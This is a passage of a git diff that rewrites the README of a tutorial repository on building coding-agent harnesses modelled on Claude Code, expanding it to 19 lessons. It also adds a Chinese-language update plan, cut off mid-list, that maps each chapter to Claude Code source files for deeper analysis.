coding agent's harness is its IDE, terminal, and filesystem access.** A farm agent's harness is its sensor array, irrigation controls, and weather data feeds. A hotel agent's harness is its booking system, guest communication channels, and facility management APIs. The agent -- the intelligence, the decision-maker -- is always the model. The harness changes per domain. The agent generalizes across them. - -This repo teaches you to build vehicles. Vehicles for coding. But the design patterns generalize to any domain: farm management, hotel operations, manufacturing, logistics, healthcare, education, scientific research. Anywhere a task needs to be perceived, reasoned about, and acted upon -- an agent needs a harness. +This repository teaches you to build the vehicle. A vehicle for coding. But the design patterns generalize to any domain. ### What Harness Engineers Actually Do -If you are reading this repository, you are likely a harness engineer -- and that is a powerful thing to be. Here is your real job: +If you are reading this repository, you are most likely a harness engineer. Here is what the job actually entails: -- **Implement tools.** Give the agent hands. File read/write, shell execution, API calls, browser control, database queries. Each tool is an action the agent can take in its environment. Design them to be atomic, composable, and well-described. +- **Implement tools.** Give the agent hands. File read/write, shell execution, API calls, browser control, database queries. Each tool is one action the agent can take in its environment. Design them atomic, composable, and clearly described. -- **Curate knowledge.** Give the agent domain expertise. Product documentation, architectural decision records, style guides, regulatory requirements. Load them on-demand (s05), not upfront. The agent should know what's available and pull what it needs. +- **Curate knowledge.** Give the agent domain expertise. Product documentation, architecture decision records, style guides, compliance requirements. Load on demand, not upfront. -- **Manage context.** Give the agent clean memory. Subagent isolation (s04) prevents noise from leaking. Context compression (s06) prevents history from overwhelming. Task systems (s07) persist goals beyond any single conversation. +- **Manage context.** Give the agent clean memory. Subagent isolation prevents noise leakage. Context compaction prevents history from drowning the present. Task systems let goals persist beyond a single conversation. -- **Control permissions.** Give the agent boundaries. Sandbox file access. Require approval for destructive operations. Enforce trust boundaries between the agent and external systems. This is where safety engineering meets harness engineering. +- **Control permissions.** Give the agent boundaries. Sandbox file access. Require approval for destructive operations. Enforce trust boundaries between the agent and external systems. -- **Collect task-process data.** Every action sequence the agent executes in your harness is training signal. The perception-reasoning-action traces from real deployments are the raw material for fine-tuning the next generation of agent models. Your harness doesn't just serve the agent -- it can help improve the agent. +- **Collect trajectory data.** Every action sequence the agent executes in your harness is training signal. Real deployment trajectories are the raw material for fine-tuning the next generation of agent models. -You are not writing the intelligence. You are building the world the intelligence inhabits. The quality of that world -- how clearly the agent can perceive, how precisely it can act, how rich its available knowledge is -- directly determines how effectively the intelligence can express itself. +You are not writing intelligence. You are building the world that intelligence inhabits. The quality of that world directly determines how effectively the intelligence can express itself. -**Build great harnesses. The agent will do the rest.** +**Build the harness well. The model will do the rest.** -### Why Claude Code -- A Masterclass in Harness Engineering +### Why Claude Code -Why does this repository dissect Claude Code specifically? +Because Claude Code is the most elegant, most complete agent harness implementation we have seen. Not because of any clever trick, but because of what it *does not* do: it does not try to be the agent. It does not impose rigid workflows. It does not substitute hand-crafted decision trees for the model's own judgment. It gives the model tools, knowledge, context management, and permission boundaries -- then gets out of the way. -Because Claude Code is the most elegant and fully-realized agent harness we have seen. Not because of any single clever trick, but because of what it *doesn't* do: it doesn't try to be the agent. It doesn't impose rigid workflows. It doesn't second-guess the model with elaborate decision trees. It provides the model with tools, knowledge, context management, and permission boundaries -- then gets out of the way. - -Look at what Claude Code actually is, stripped to its essence: +Strip Claude Code down to its essence: ``` Claude Code = one agent loop + tools (bash, read, write, edit, glob, grep, browser...) + on-demand skill loading - + context compression + + context compaction + subagent spawning - + task system with dependency graph - + team coordination with async mailboxes - + worktree isolation for parallel execution + + task system with dependency graphs + + async mailbox team coordination + + worktree-isolated parallel execution + permission governance + + hooks extension system + + memory persistence + + MCP external capability routing ``` -That's it. That's the entire architecture. Every component is a harness mechanism -- a piece of the world built for the agent to inhabit. The agent itself? It's Claude. A model. Trained by Anthropic on the full breadth of human reasoning and code. The harness doesn't make Claude smart. Claude is already smart. The harness gives Claude hands, eyes, and a workspace. - -This is why Claude Code is the ideal teaching subject: **it demonstrates what happens when you trust the model and focus your engineering on the harness.** Every session in this repository (s01-s12) reverse-engineers one harness mechanism from Claude Code's architecture. By the end, you understand not just how Claude Code works, but the universal principles of harness engineering that apply to any agent in any domain. - -The lesson is not "copy Claude Code." The lesson is: **the best agent products are built by engineers who understand that their job is harness, not intelligence.** - ---- - -## The Vision: Fill the Universe with Real Agents - -This is not just about coding agents. - -Every domain where humans perform complex, multi-step, judgment-intensive work is a domain where agents can operate -- given the right harness. The patterns in this repository are universal: - -``` -Estate management agent = model + property sensors + maintenance tools + tenant comms -Agricultural agent = model + soil/weather data + irrigation controls + crop knowledge -Hotel operations agent = model + booking system + guest channels + facility APIs -Medical research agent = model + literature search + lab instruments + protocol docs -Manufacturing agent = model + production line sensors + quality controls + logistics -Education agent = model + curriculum knowledge + student progress + assessment tools -``` - -The loop is always the same. The tools change. The knowledge changes. The permissions change. The agent -- the model -- generalizes. - -Every harness engineer reading this repository is learning patterns that apply far beyond software engineering. You are learning to build the infrastructure for an intelligent, automated future. Every well-designed harness deployed in a real domain is one more place where an agent can perceive, reason, and act. +That is it. The agent itself? Claude. A model. Trained by Anthropic on the full breadth of human reasoning and code. The harness did not make Claude smart. Claude was already smart. The harness gave Claude hands, eyes, and a workspace. -First we fill the workshops. Then the farms, the hospitals, the factories. Then the cities. Then the planet. - -**Bash is all you need. Real agents are all the universe needs.** +The takeaway is not "copy Claude Code." The takeaway is: **the best agent products come from engineers who understand that their job is the harness, not the intelligence.** --- @@ -151,43 +122,13 @@ First we fill the workshops. Then the farms, the hospitals, the factories. Then loop back -----------------> messages[] - That's the minimal loop. Every AI agent needs this loop. - The MODEL decides when to call tools and when to stop. - The CODE just executes what the model asks for. - This repo teaches you to build what surrounds this loop -- + The model decides when to call tools and when to stop. + The code just executes what the model asks for. + This repo teaches you to build everything around this loop -- the harness that makes the agent effective in a specific domain. ``` -**12 progressive sessions, from a simple loop to isolated autonomous execution.** -**Each session adds one harness mechanism. Each mechanism has one motto.** - -> **s01**   *"One loop & Bash is all you need"* — one tool + one loop = an agent -> -> **s02**   *"Adding a tool means adding one handler"* — the loop stays the same; new tools register into the dispatch map -> -> **s03**   *"An agent without a plan drifts"* — list the steps first, then execute; completion doubles -> -> **s04**   *"Break big tasks down; each subtask gets a clean context"* — subagents use independent messages[], keeping the main conversation clean -> -> **s05**   *"Load knowledge when you need it, not upfront"* — inject via tool_result, not the system prompt -> -> **s06**   *"Context will fill up; you need a way to make room"* — three-layer compression strategy for infinite sessions -> -> **s07**   *"Break big goals into small tasks, order them, persist to disk"* — a file-based task graph with dependencies, laying the foundation for multi-agent collaboration -> -> **s08**   *"Run slow operations in the background; the agent keeps thinking"* — daemon threads run commands, inject notifications on completion -> -> **s09**   *"When the task is too big for one, delegate to teammates"* — persistent teammates + async mailboxes -> -> **s10**   *"Teammates need shared communication rules"* — one request-response pattern drives all negotiation -> -> **s11**   *"Teammates scan the board and claim tasks themselves"* — no need for the lead to assign each one -> -> **s12**   *"Each works in its own directory, no interference"* — tasks manage goals, worktrees manage directories, bound by ID - ---- - -## The Core Pattern +## Core Pattern ```python def agent_loop(messages): @@ -214,140 +155,182 @@ def agent_loop(messages): messages.append({"role": "user", "content": results}) ``` -Every session layers one harness mechanism on top of this loop -- without changing the loop itself. The loop belongs to the agent. The mechanisms belong to the harness. +Every lesson layers one harness mechanism on top of this loop -- the loop itself never changes. The loop belongs to the agent. The mechanisms belong to the harness. -## Scope (Important) +--- -This repository is a 0->1 learning project for harness engineering -- building the environment that surrounds an agent model. -It intentionally simplifies or omits several production mechanisms: +## 19 Progressive Lessons -- Full event/hook buses (for example PreToolUse, SessionStart/End, ConfigChange). - s12 includes only a minimal append-only lifecycle event stream for teaching. -- Rule-based permission governance and trust workflows -- Session lifecycle controls (resume/fork) and advanced worktree lifecycle controls -- Full MCP runtime details (transport/OAuth/resource subscribe/polling) +**Each lesson adds one harness mechanism. Each mechanism has a motto.** -Treat the team JSONL mailbox protocol in this repo as a teaching implementation, not a claim about any specific production internals. +> **s01**   *"One loop & Bash is all you need"* — one tool + one loop = one agent +> +> **s02**   *"Adding a tool means adding one handler"* — the loop stays untouched; new tools register into the dispatch map +> +> **s03**   *"Set boundaries first, then grant freedom"* — the permission pipeline decides which operations need approval +> +> **s04**   *"Hook around the loop, never rewrite the loop"* — hooks inject extension logic before and after tool execution +> +> **s05**   *"An agent without a plan drifts"* — list the steps before starting; completion rate doubles +> +> **s06**   *"Big tasks split small, each subtask gets clean context"* — subagents use a fresh messages[], keeping the main conversation clean +> +> **s07**   *"Load knowledge on demand, not upfront"* — inject via tool_result, not the system prompt +> +> **s08**   *"Context always fills up -- have a way to make room"* — multi-layer compaction strategies buy you infinite sessions +> +> **s09**   *"Remember what matters, forget what doesn't"* — three subsystems: selection, extraction, consolidation +> +> **s10**   *"Prompts are assembled at runtime, not hardcoded"* — section-based concatenation, loaded on demand +> +> **s11**   *"Errors aren't the end, they're the start of a retry"* — escalate tokens, compact context, switch models +> +> **s12**   *"Big goals break into small tasks, ordered, persisted to disk"* — a file-backed task graph that lays the groundwork for multi-agent coordination +> +> **s13**   *"Slow ops go background, agent keeps thinking"* — background threads run commands; notifications inject on completion +> +> **s14**   *"Fire on schedule, no human kick needed"* — cron scheduling, durable or session-scoped +> +> **s15**   *"Too big for one agent -- delegate to teammates"* — persistent teammates + async mailboxes +> +> **s16**   *"Teammates need shared communication rules"* — one request-response pattern drives all negotiation +> +> **s17**   *"Teammates check the board, claim work themselves"* — no leader assigning one by one; self-organizing +> +> **s18**   *"Each works in its own directory, no interference"* — tasks own goals, worktrees own directories, bound by ID +> +> **s19**   *"Not enough capability? Plug in more via MCP"* — multi-transport, channel routing, tool pool merging -## Quick Start +--- -```sh -git clone https://github.com/shareAI-lab/learn-claude-code -cd learn-claude-code -pip install -r requirements.txt -cp .env.example .env # Edit .env with your ANTHROPIC_API_KEY +## Five Stages -python agents/s01_agent_loop.py # Start here -python agents/s12_worktree_task_isolation.py # Full progression endpoint -python agents/s_full.py # Capstone: all mechanisms combined -``` +| Stage | Chapters | What you are building | +|---|---|---| +| **Tool pipeline** | `s01-s04` | loop → tool dispatch → permission pipeline → hook extensions | +| **Single-agent capability** | `s05-s08` | planning → subagent → skill loading → context compaction | +| **Knowledge and resilience** | `s09-s11` | memory → prompt assembly → error recovery | +| **Durable work** | `s12-s14` | task graph → background execution → scheduled triggers | +| **Multi-agent platform** | `s15-s19` | teams → protocols → autonomy → worktree isolation → MCP | -### Web Platform +--- -Interactive visualizations, step-through diagrams, source viewer, and documentation. +## All Chapters + +| Chapter | Topic | Key Concepts | +|---|---|---| +| [s01](./s01_agent_loop/) | Agent Loop | `messages` / `while True` / `stop_reason` | +| [s02](./s02_tool_use/) | Tool Use | `TOOL_HANDLERS` / dispatch map / concurrency | +| [s03](./s03_permission/) | Permission System | `PermissionRule` / approval pipeline | +| [s04](./s04_hooks/) | Hook System | `PreToolUse` / `PostToolUse` / extension points | +| [s05](./s05_todo_write/) | TodoWrite | `TodoItem` / plan-then-execute | +| [s06](./s06_subagent/) | Subagent | `fresh messages[]` / context isolation | +| [s07](./s07_skill_loading/) | Skill Loading | `SkillManifest` / on-demand injection | +| [s08](./s08_context_compact/) | Context Compact | snipCompact / microCompact / toolResultBudget / autoCompact | +| [s09](./s09_memory/) | Memory System | selection / extraction / consolidation | +| [s10](./s10_system_prompt/) | System Prompt | runtime assembly / section concatenation | +| [s11](./s11_error_recovery/) | Error Recovery | token escalation / fallback model / retry strategies | +| [s12](./s12_task_system/) | Task System | `TaskRecord` / `blockedBy` / disk persistence | +| [s13](./s13_background_tasks/) | Background Tasks | threaded execution / notification queue | +| [s14](./s14_cron_scheduler/) | Cron Scheduler | durable scheduling / session-scoped triggers | +| [s15](./s15_agent_teams/) | Agent Teams | `MessageBus` / inbox / permission bubbling | +| [s16](./s16_team_protocols/) | Team Protocols | shutdown handshake / plan approval | +| [s17](./s17_autonomous_agents/) | Autonomous Agents | idle cycle / auto-claim / self-organization | +| [s18](./s18_worktree_isolation/) | Worktree Isolation | `WorktreeRecord` / task-directory binding | +| [s19](./s19_mcp_plugin/) | MCP Plugin | multi-transport / channel routing / tool pool merge | +| [s_full](./s_full/) | Capstone | all mechanisms from s01-s19 merged | -```sh -cd web && npm install && npm run dev # http://localhost:3000 -``` +--- + +## How to Read -## Learning Path +Each chapter is a folder. Open one and you will find: ``` -Phase 1: THE LOOP Phase 2: PLANNING & KNOWLEDGE -================== ============================== -s01 The Agent Loop [1] s03 TodoWrite [5] - while + stop_reason TodoManager + nag reminder - | | - +-> s02 Tool Use [4] s04 Subagents [5] - dispatch map: name->handler fresh messages[] per child - | - s05 Skills [5] - SKILL.md via tool_result - | - s06 Context Compact [5] - 3-layer compression - -Phase 3: PERSISTENCE Phase 4: TEAMS -================== ===================== -s07 Tasks [8] s09 Agent Teams [9] - file-based CRUD + deps graph teammates + JSONL mailboxes - | | -s08 Background Tasks [6] s10 Team Protocols [12] - daemon threads + notify queue shutdown + plan approval FSM - | - s11 Autonomous Agents [14] - idle cycle + auto-claim - | - s12 Worktree Isolation [16] - task coordination + optional isolated execution lanes - - [N] = number of tools +s08_context_compact/ + README.md # full narrative with inline code + README.en.md # English translation + README.ja.md # Japanese translation + code.py # standalone runnable implementation + images/ # SVG diagrams (where needed) ``` -## Architecture +Read the `README.md` for the core idea and work through the code. Complex chapters have `
` folds for deep dives -- open them when you want to go deeper. Simple chapters have 0-1 diagrams, complex chapters have more. +Read from s01 through s19 in order. Each chapter assumes you've read the previous ones and ends with a hook into the next. + +--- + +## Quick Start + +```sh +git clone https://github.com/shareAI-lab/learn-claude-code +cd learn-claude-code +pip install -r requirements.txt +cp .env.example .env # configure ANTHROPIC_API_KEY + +python s01_agent_loop/code.py # Start here -- one loop + bash +python s08_context_compact/code.py # Context compaction (complex) +python s_full/code.py # Capstone: all mechanisms ``` -learn-claude-code/ -| -|-- agents/ # Python reference implementations (s01-s12 + s_full capstone) -|-- docs/{en,zh,ja}/ # Mental-model-first documentation (3 languages) -|-- web/ # Interactive learning platform (Next.js) -|-- skills/ # Skill files for s05 -+-- .github/workflows/ci.yml # CI: typecheck + build -``` -## Documentation +--- + +## Project Structure -Mental-model-first: problem, solution, ASCII diagram, minimal code. -Available in [English](./docs/en/) | [中文](./docs/zh/) | [日本語](./docs/ja/). +``` +learn-claude-code/ + s01_agent_loop/ # one folder per chapter + README.md # Chinese source (complete narrative) + README.en.md # English translation + README.ja.md # Japanese translation + code.py # standalone runnable code + images/ # SVG diagrams + s02_tool_use/ + ... + s19_mcp_plugin/ + s_full/ # capstone + agents/ # flat copies for quick python agents/sXX.py + skills/ # skill files used by s07 + docs/ # legacy online docs (archived) + web/ # web teaching platform + tests/ +``` -| Session | Topic | Motto | -|---------|-------|-------| -| [s01](./docs/en/s01-the-agent-loop.md) | The Agent Loop | *One loop & Bash is all you need* | -| [s02](./docs/en/s02-tool-use.md) | Tool Use | *Adding a tool means adding one handler* | -| [s03](./docs/en/s03-todo-write.md) | TodoWrite | *An agent without a plan drifts* | -| [s04](./docs/en/s04-subagent.md) | Subagents | *Break big tasks down; each subtask gets a clean context* | -| [s05](./docs/en/s05-skill-loading.md) | Skills | *Load knowledge when you need it, not upfront* | -| [s06](./docs/en/s06-context-compact.md) | Context Compact | *Context will fill up; you need a way to make room* | -| [s07](./docs/en/s07-task-system.md) | Tasks | *Break big goals into small tasks, order them, persist to disk* | -| [s08](./docs/en/s08-background-tasks.md) | Background Tasks | *Run slow operations in the background; the agent keeps thinking* | -| [s09](./docs/en/s09-agent-teams.md) | Agent Teams | *When the task is too big for one, delegate to teammates* | -| [s10](./docs/en/s10-team-protocols.md) | Team Protocols | *Teammates need shared communication rules* | -| [s11](./docs/en/s11-autonomous-agents.md) | Autonomous Agents | *Teammates scan the board and claim tasks themselves* | -| [s12](./docs/en/s12-worktree-task-isolation.md) | Worktree + Task Isolation | *Each works in its own directory, no interference* | +--- -## What's Next -- from understanding to shipping +## What's Next -After the 12 sessions you understand how harness engineering works inside out. Two ways to put that knowledge to work: +After 19 lessons, you understand harness engineering from the inside out. Two paths to turn that knowledge into product: ### Kode Agent CLI -- Open-Source Coding Agent CLI -> `npm i -g @shareai-lab/kode` +> `npm i -g @anthropic-ai/kode` -Skill & LSP support, Windows-ready, pluggable with GLM / MiniMax / DeepSeek and other open models. Install and go. +Skill and LSP support, Windows compatible, works with GLM / MiniMax / DeepSeek and other open models. Install and go. -GitHub: **[shareAI-lab/Kode-cli](https://github.com/shareAI-lab/Kode-cli)** +GitHub: **[shareAI-lab/Kode-Agent](https://github.com/shareAI-lab/Kode-Agent)** -### Kode Agent SDK -- Embed Agent Capabilities in Your App +### Kode Agent SDK -- Embed Agent Capabilities in Your Application -The official Claude Code Agent SDK communicates with a full CLI process under the hood -- each concurrent user means a separate terminal process. Kode SDK is a standalone library with no per-user process overhead, embeddable in backends, browser extensions, embedded devices, or any runtime. +A standalone library with no per-user process overhead. Embed it in backends, browser extensions, embedded devices, or any runtime. -GitHub: **[shareAI-lab/Kode-agent-sdk](https://github.com/shareAI-lab/Kode-agent-sdk)** +GitHub: **[shareAI-lab/kode-agent-sdk](https://github.com/shareAI-lab/kode-agent-sdk)** --- -## Sister Repo: from *on-demand sessions* to *always-on assistant* +## Sister Tutorial: From Passive Sessions to Always-On Assistants -The harness this repo teaches is **use-and-discard** -- open a terminal, give the agent a task, close when done, next session starts blank. That is the Claude Code model. +The harness taught in this repository is the **use-and-discard** kind -- open a terminal, give the agent a task, close when done, next session starts fresh. Claude Code works this way. -[OpenClaw](https://github.com/openclaw/openclaw) proved another possibility: on top of the same agent core, two harness mechanisms turn the agent from "poke it to make it move" into "it wakes up every 30 seconds to look for work": +But [OpenClaw](https://github.com/openclaw/openclaw) proves another possibility: on the same agent core, two additional harness mechanisms turn an agent from "poke it and it moves" into "wakes itself every 30 seconds to look for work": -- **Heartbeat** -- every 30s the harness sends the agent a message to check if there is anything to do. Nothing? Go back to sleep. Something? Act immediately. -- **Cron** -- the agent can schedule its own future tasks, executed automatically when the time comes. +- **Heartbeat** -- every 30 seconds the harness sends the agent a message, letting it check for pending work. Nothing to do? Keep sleeping. Something appeared? Act immediately. +- **Cron** -- the agent can schedule its own future tasks, which fire automatically when the time arrives. -Add multi-channel IM routing (WhatsApp / Telegram / Slack / Discord, 13+ platforms), persistent context memory, and a Soul personality system, and the agent goes from a disposable tool to an always-on personal AI assistant. +Add IM multi-channel routing (WhatsApp / Telegram / Slack / Discord and 13+ other platforms), persistent context memory, and a Soul personality system, and the agent transforms from a disposable tool into an always-on personal AI assistant. -**[claw0](https://github.com/shareAI-lab/claw0)** is our companion teaching repo that deconstructs these harness mechanisms from scratch: +**[claw0](https://github.com/shareAI-lab/claw0)** is our sister teaching repository, breaking down these harness mechanisms from scratch: ``` claw agent = agent core + heartbeat + cron + IM chat + memory + soul @@ -355,23 +338,19 @@ claw agent = agent core + heartbeat + cron + IM chat + memory + soul ``` learn-claude-code claw0 -(agent harness core: (proactive always-on harness: - loop, tools, planning, heartbeat, cron, IM channels, - teams, worktree isolation) memory, soul personality) +(agent harness internals: (always-on harness: + loop, tools, planning, heartbeat, cron, IM channels, + teams, worktree isolation) memory, Soul personality) ``` -## About -
- -Scan with WeChat to follow us, -or follow on X: [shareAI-Lab](https://x.com/baicai003) - ## License MIT --- -**Agency comes from the model. The harness makes agency real. Build great harnesses. The model will do the rest.** +**Agency comes from the model. The harness gives agency a place to land. Build the harness well, and the model will do the rest.** **Bash is all you need. Real agents are all the universe needs.** + +**This is not "copy the source code." This is "grasp the key designs and build it yourself."** diff --git a/UPDATE-PLAN.md b/UPDATE-PLAN.md new file mode 100644 index 000000000..7787d21d6 --- /dev/null +++ b/UPDATE-PLAN.md @@ -0,0 +1,339 @@ +# Session 更新计划 + +## 原则 + +- 每章开独立 Explore Agent 深入读 CC 源码,拿到具体的字段名、行号、常量值、算法逻辑 +- 源码分析写入 `
` 折叠,不污染教学主线 +- 深入但不堆砌——只保留对理解核心概念有帮助的差异点 +- 简单章(概念足够直观)分析可以轻量,复杂章(机制密集)必须全量 + +## 更新完成标准 + +每章更新后应满足: +- [ ] README 主线无 CC 内部工程术语(tengu_*、GrowthBook 等) +- [ ] `
` 折叠中有基于源码行号的逐项对照 +- [ ] 关键差异点有"教学版为什么简化"的说明 +- [ ] 复杂章有 SVG 图,简单章 code 够用 +- [ ] code.py 可独立运行 + +--- + +## Batch 1: 已有深度的章(微调) + +### s01 Agent Loop ✅ 已完成 +- query.ts 1729 行全量分析 +- State 11 字段 + 10 退出路径 + 7 继续路径 +- 改动:无需 + +### s02 Tool Use ✅ 已完成 +- Tool.ts + toolOrchestration.ts + StreamingToolExecutor.ts 分析 +- isConcurrencySafe vs isReadOnly 修正 +- 并发对比 SVG +- 改动:无需 + +### s08 Context Compact ✅ 已完成 +- compact.ts 1705 行 + autoCompact.ts 351 行全量分析 +- 5 层修正为 4 层管线 + 应急 +- 14 个精确常量 +- 改动:无需 + +--- + +## Batch 2: 亟待深化的复杂章(深度分析 + 重写 CC 对照) + +### s03 Permission System + +**CC 源码位置**: +- `src/Tool.ts` — checkPermissions(), PermissionResult 类型 +- `src/services/tools/toolExecution.ts` — checkPermissionsAndCallTool() 完整管线 +- `src/tools.ts` — canUseTool callback, permissionContext +- `src/query.ts` — permission 在循环中的调用点 +- YoloClassifier / auto-approve 逻辑 + +**分析重点**: +1. PermissionResult 的完整类型定义(allow/deny/ask 三种决策) +2. checkPermissions 的调用时机和参数 +3. canUseTool callback 的签名和作用 +4. 权限决策管线的精确顺序(schema → validateInput → hooks → permission → call) +5. YoloClassifier 如何自动批准 +6. permission bubbling 机制 + +**更新内容**: +- [ ] 重写 `
` 折叠:完整 PermissionResult 类型 + 管线顺序 + 行号 +- [ ] 补充 permission bubbling 概念 +- [ ] 术语小抄补上 + +--- + +### s04 Hooks System + +**CC 源码位置**: +- `src/services/tools/toolHooks.ts` (650 行) — PreToolUse/PostToolUse 钩子执行 +- `src/query.ts` — stop hooks, hook_stopped_continuation +- `src/hooks/` 目录 — 各类 React hooks(与教学无关),但 stop hooks 相关的逻辑在 query.ts +- `src/services/compact/postCompactCleanup.ts` — 压缩后钩子清理 + +**分析重点**: +1. PreToolUse hooks 的完整执行流程和返回值类型 +2. PostToolUse hooks 的触发时机 +3. Hook 返回值如何影响工具执行(preventContinuation, updatedInput, permissionDecision) +4. Stop hooks 的触发时机和处理逻辑 +5. 钩子注册和优先级机制 + +**更新内容**: +- [ ] 重写 `
` 折叠:PreToolUse/PostToolUse/Stop hooks 的完整类型 + 触发时机 + 行号 +- [ ] 教学版的 register_hook/trigger_hooks 与 CC 的差异对比 + +--- + +### s09 Memory System + +**CC 源码位置**: +- `src/services/extractMemories/extractMemories.ts` (615 行) — 记忆提取 +- `src/services/extractMemories/prompts.ts` — 提取 prompt +- `src/services/SessionMemory/sessionMemory.ts` (495 行) — 会话记忆 +- `src/services/SessionMemory/prompts.ts` — 记忆 prompt +- `src/services/autoDream/consolidationLock.ts` — 巩固锁 +- `src/query.ts` — 记忆加载和提取的调用点 + +**分析重点**: +1. MemorySelector 的筛选算法(embedding 相似度 vs 关键词) +2. ExtractMemories 的触发时机(stop hook 中,不是 autoCompact 后) +3. DreamConsolidator 的触发频率和逻辑 +4. 记忆的 JSON 结构(type、tags、timestamp、expires_at) +5. session memory vs user memory 的区分 +6. 记忆文件存储位置和格式 + +**更新内容**: +- [ ] 重写 `
` 折叠:三子系统的具体触发时机 + 数据结构 + 行号 +- [ ] 补充 session memory compact(s08 中回撤的那个机制) +- [ ] 术语小抄补上 + +--- + +### s11 Error Recovery + +**CC 源码位置**: +- `src/query.ts` — 全部恢复逻辑: + - max_tokens escalation (8K→64K) + - max_output_tokens recovery (续写提示,最多 3 次) + - collapse_drain_retry + - reactive_compact_retry + - stop_hook_blocking + - token_budget_continuation + - fallback model 切换 + - 指数退避 + +**分析重点**: +1. 7 种 Continue 路径的精确触发条件和行号(部分已在 s01 中覆盖) +2. 指数退避的具体参数(BASE_DELAY_MS, MAX_RETRIES, jitter) +3. fallback model 的切换逻辑 +4. max_tokens escalation 的单次限制 +5. reactiveCompact vs autoCompact 的触发差异 + +**更新内容**: +- [ ] 重写 `
` 折叠:四条恢复路径的精确条件 + 常量 + 行号 +- [ ] 添加错误恢复决策树 SVG +- [ ] 术语小抄补上 + +--- + +### s15 Agent Teams + +**CC 源码位置**: +- `src/hooks/useSwarmInitialization.ts` (81 行) — Team/Swarm 初始化 +- `src/hooks/useSwarmPermissionPoller.ts` (330 行) — 权限轮询 +- `src/hooks/useInboxPoller.ts` (969 行) — 收件箱轮询 +- `src/hooks/useTeammateViewAutoExit.ts` (63 行) — 队友自动退出 +- `src/Task.ts` — teammate 相关的 task 逻辑 +- `src/query.ts` — teammate idle notification, TaskCompleted hooks + +**分析重点**: +1. Teammate 的生命周期管理 +2. 收件箱的 JSONL 格式和读写锁 +3. 消息总线的实现方式 +4. permission bubbling 在 team 中的实际应用 +5. teammate 的 idle 通知机制 + +**更新内容**: +- [ ] 重写 `
` 折叠:team 拓扑 + 消息格式 + 权限冒泡 + 行号 +- [ ] 术语小抄补上 + +--- + +### s19 MCP Plugin + +**CC 源码位置**: +- `src/services/mcp/client.ts` (3348 行) — MCP Client 核心 +- `src/services/mcp/auth.ts` — MCP 认证 +- `src/services/mcp/config.ts` — MCP 配置 +- `src/services/mcp/channelPermissions.ts` (240 行) — 通道权限 +- `src/services/mcp/channelNotification.ts` — 通道通知 +- `src/services/mcp/channelAllowlist.ts` — 通道白名单 + +**分析重点**: +1. MCP Client 的连接生命周期(stdio/SSE/HTTP 三种 transport) +2. tools/list 和 tools/call 的 JSON-RPC 协议细节 +3. Channel 机制——MCP server 如何反向给 Agent 发消息 +4. 工具池合并的精确算法 +5. MCP tool 的命名规则(mcp__server__tool) + +**更新内容**: +- [ ] 重写 `
` 折叠:MCP 协议细节 + transport 类型 + channel 机制 + 行号 +- [ ] 术语小抄补上 + +--- + +## Batch 3: 中等复杂章(定向分析 + 补充 CC 对照) + +### s06 Subagent + +**CC 源码位置**: +- `src/tools/AgentTool/` — AgentTool 定义 +- `src/query.ts` — fork mode, fresh messages[] +- `src/Task.ts` — 子 Agent 的 task 绑定 + +**分析重点**: +1. fork mode vs fresh mode 的实际差异 +2. prompt cache 在子 Agent 中的共享机制 +3. 子 Agent 的上下文限制 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s07 Skill Loading + +**CC 源码位置**: +- `src/setup.ts` — skill loading 初始化 +- `src/query.ts` — skill 注入点 +- `src/tools.ts` — skill 工具的注册 + +**分析重点**: +1. Skill 的目录结构和 manifest 格式 +2. 两级加载的具体实现 +3. Skill 内容注入方式(system prompt vs tool_result) + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s10 System Prompt + +**CC 源码位置**: +- `src/constants/systemPromptSections.ts` (68 行) — 所有 prompt section +- `src/constants/prompts.ts` (914 行) — 完整 prompt 模板 +- `src/context.ts` (189 行) — 上下文组装 +- `src/query.ts` — getSystemContext/getUserContext 调用点 + +**分析重点**: +1. system prompt 的 section 列表和顺序 +2. 运行时组装的逻辑(哪些始终加载,哪些按需) +3. memoize 缓存机制 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s12 Task System + +**CC 源码位置**: +- `src/utils/tasks.ts` (862 行) — Task 数据结构和 CRUD +- `src/tools/TaskCreateTool/TaskCreateTool.ts` — 创建任务 +- `src/tools/TaskListTool/TaskListTool.ts` — 列出任务 +- `src/tools/TaskGetTool/TaskGetTool.ts` — 获取任务 +- `src/tools/TaskUpdateTool/TaskUpdateTool.ts` — 更新任务 +- `src/hooks/useTaskListWatcher.ts` (221 行) — 任务看板监听 + +**分析重点**: +1. TaskRecord 的完整字段(id, subject, status, owner, blockedBy, ...) +2. 任务状态机的所有合法转换 +3. claim task 的并发安全机制 +4. 任务文件存储格式 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 +- [ ] 任务状态机 SVG + +### s13 Background Tasks + +**CC 源码位置**: +- `src/query.ts` — pendingToolUseSummary, notification queue, background execution + +**分析重点**: +1. background task 的线程模型 +2. notification queue 的注入时机 +3. pendingToolUseSummary 的生成(Haiku 后台摘要) + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +### s14 Cron Scheduler + +**CC 源码位置**: +- `src/hooks/useScheduledTasks.ts` (139 行) +- CC 的 cron job 存储和触发机制 + +**分析重点**: +1. durable vs session-only 的持久化方式 +2. cron 表达式的解析和匹配算法 +3. 调度器在主循环中的集成点 + +**更新内容**: +- [ ] 补充 CC 源码对照折叠 +- [ ] 术语小抄 + +--- + +## Batch 4: 概念章或教学虚构章(轻量分析) + +### s05 TodoWrite +- CC 中已被 Task 系统取代 +- [ ] 补充说明 CC 的演进路径 +- [ ] 术语小抄 + +### s16 Team Protocols +- shutdown_request/response 协议在 query.ts 中的实现 +- [ ] 轻量 CC 对照 + +### s17 Autonomous Agents +- 来新璐指出"真实 CC 里没有这套",是教学假设 +- [ ] 开篇诚实标注,不需要 CC 源码分析 +- [ ] 术语小抄 + +### s18 Worktree Isolation +- git worktree 命令的使用在 setup.ts/tools.ts 中 +- [ ] 轻量 CC 对照 + +--- + +## 执行顺序 + +``` +Batch 1 (已完成): s01, s02, s08 + +Batch 2 (深度分析, 本周): + Day 1: s03 Permission + s04 Hooks (并行跑 2 个 Agent) + Day 2: s09 Memory + s11 Error Recovery (并行跑 2 个 Agent) + Day 3: s15 Agent Teams + s19 MCP (并行跑 2 个 Agent) + +Batch 3 (定向分析, 后续): + s06 Subagent + s07 Skill Loading (并行) + s10 System Prompt + s12 Task System (并行) + s13 Background + s14 